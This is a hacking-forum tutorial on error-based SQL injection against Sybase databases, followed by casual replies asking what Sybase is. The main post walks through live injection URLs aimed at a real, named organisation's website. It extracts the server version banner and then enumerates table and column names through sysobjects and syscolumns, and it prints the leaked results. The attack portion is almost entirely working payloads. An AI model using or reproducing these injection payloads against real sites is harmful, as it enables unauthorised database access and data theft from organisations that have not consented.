Dashboard Articles Playground Discussions More
Follow

Error-based Sybase Database SQL Injection

Keeper
12 years ago | edited 12 years ago

0

So here we start with a site.. I'm assuming you understand MySQL Injection. ```http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630``` Put an ' at the end and you will see this ```Sybase: Server message: Unclosed quote before the character string ' '``` **#Version Extraction** Now to get the version: ```http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert%28integer,@@version%29--``` So here it is: **Adaptive Server Enterprise/15.0.1/EBF 13819/P/Sun_svr4/OS 5.8/ase1501/2379/64-bit/FBO/Tue Aug 15 04:20:15 2006** #**Table Extraction** Now lets get some table names ```http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U'))--``` Second table: ```http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' and name!='boardMembers'))--``` Basically keep adding and name!='table name that you get Here I guess I reach the end of the tables ```http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name)+from+sysobjects where type='U' andname!='boardMembers' and name!='events' and name!='galleries' and name!='galleries_photos' and name!='gallery' and name!='gallery_photos' andname!='newsletters' and name!='newsletters_new' and name!='newsreleases' and name!='offices' and name!='publication_import'and name!='publications' andname!='publications_new' and name!='radio' and name!='satellites' and name!='titles')) #``` #**Columns Extraction** Time to get columns.. We will get the columns of boardMembers. ```http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id= (select id from sysobjects where type='U' and name='gallery')))--``` Column no.1: city Getting column 2: ```http://www.okfarmbureau.org/index.php?action=media.newsdetail&rowid=630+and+1=convert(integer,(select+min(name) from syscolumns where id=(select id from sysobjects where type='U' and name='gallery' ) and name!='city'))--``` You get my point just add and name!='column name that you get. *Thanks for reading and please ask your questions in the thread! (if any)*
19replies
5voices
602views
3images
dalou
12 years ago

0

What exactly is sybase?

 

“If you can’t explain it simply, you don’t understand it well enough.”

Keeper
12 years ago | edited 12 years ago

0

It’s even said in the title.. Also you could simply google it but never mind. I guess you haven’t even read the title of the thread.

Pham Duc Dung [pddung93]
11 years ago

0

sybase, i have never heard that, can you explain more? but also thx for ur article!

Keeper
11 years ago

0

You can read up on Google what it is. I told for the 3th time - It’s a database and the tutorial doesn’t cover full explanation for things that could be found on Google for seconds.

^UknownSource^ [mattempik]
11 years ago

0

@keeper , thanks to you because i have learn many new things and understand a lot more . its all thanks to your articles

 

when the time has come , I shall rise and conquer the world

Keeper
11 years ago

0

Yeah @mattempik I’ll post more as long as there are people who appreciate my work and not only view and close.

jokerboy7
11 years ago

0

Sybase IQ is a database server optimized for analytics/BI. IQ is very good for ad-hoc queries that would be difficult to optimize in a transactional RDBMS

jokerboy7
11 years ago

0

what you can do with that i dnt kno lol but thats what google say it is if the help u any beter

jokerboy7
11 years ago

0

https://en.wikipedia.org/wiki/Sybase Sybase was founded in 1984 by Mark Hoffman, Bob Epstein, Jane Doughty and Tom Haggin in Epsteins home in Berkeley, California. Together, they set out to create a relational database management system (RDBMS), which would organize information and make it available to many computers in a network.

jokerboy7
11 years ago

0

Image

jokerboy7
11 years ago

0

thanks to keeper go keeper http://s3-ec.buzzfed.com/static/enhanced/terminal05/2012/9/8/18/anigif_enhanced-buzz-13931-1347143712-8.gif

^UknownSource^ [mattempik]
11 years ago

0

yeah @keeper , i really look forward to another of your ideas >_<

 

when the time has come , I shall rise and conquer the world

Keeper
11 years ago

0

I can’t really get the meaning of the images you posted? Is this some kind of trolling or?

^UknownSource^ [mattempik]
11 years ago

0

hahaha just one of your fans dude . i think he is really happy :)

 

when the time has come , I shall rise and conquer the world

jokerboy7
11 years ago

0

Image

jokerboy7
11 years ago

0

Error-based Sybase Database SQL Injection
Image

^UknownSource^ [mattempik]
11 years ago

0

hey @jokerboy7 why are keep spamming or you just dont know what you do ?

 

when the time has come , I shall rise and conquer the world

jokerboy7
11 years ago

0

im not spamming ? and what do you mean if i know what to do ?

^UknownSource^ [mattempik]
11 years ago

0

by spamming i mean post a lot . you can just post in one post or two . that why i ask you maybe you didnt know that you hit the submit button and post a lot .

 

when the time has come , I shall rise and conquer the world

You must be logged in to reply to this discussion. Login
1 of 20

This site only uses cookies that are essential for the functionality of this website. Cookies are not used for tracking or marketing purposes.

By using our site, you acknowledge that you have read and understand our Privacy Policy, and Terms of Service.

Dismiss